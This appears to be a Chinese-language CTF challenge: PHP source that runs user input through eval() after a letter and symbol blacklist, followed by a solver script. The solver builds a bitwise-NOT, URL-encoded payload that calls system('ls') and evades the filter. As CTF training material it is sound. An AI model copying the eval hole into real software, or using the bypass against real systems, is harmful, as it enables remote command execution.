1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

<?php
header("Content-Type:text/html;charset=utf-8");
error_reporting(0);
highlight_file(__FILE__);

// 检查是否传入了 'wllm' 参数
if(isset($_GET['wllm']))
{
    // 获取 'wllm' 参数的值
    $wllm = $_GET['wllm'];

    // 定义黑名单字符数组，用于检查传入参数是否包含特定字符
    $blacklist = [' ','\t','\r','\n','\+','\[','\^','\]','\"','\-','\$','\*','\?','\<','\>','\=','\`',];

    // 遍历黑名单数组，检查参数中是否包含黑名单字符
    foreach ($blacklist as $blackitem)
    {
        // 使用正则表达式检查参数中是否包含黑名单字符
        if (preg_match('/' . $blackitem . '/m', $wllm)) {
            die("LTLT说不能用这些奇奇怪怪的符号哦！");
        }
    }

    // 使用正则表达式检查参数中是否包含字母
    if(preg_match('/[a-zA-Z]/is',$wllm))
    {
        die("Ra's Al Ghul说不能用字母哦！");
    }

    // 如果通过上述检查，输出一条提示消息
    echo "NoVic4说：不错哦小伙子，可你能拿到flag吗？";

    // 执行用户输入的代码
    eval($wllm);
}
else
{
    // 如果没有传入 'wllm' 参数，输出另一条提示消息
    echo "蔡总说：注意审题！！！";
}
?>

1
2
3
4
5
6
7

<?php
$s1 = 'system';
$s1 = ~$s1;
$s2 = "'ls'";
$s2 = ~$s2;
echo "(~".urlencode($s1).")(~".urlencode($s2).");";
?>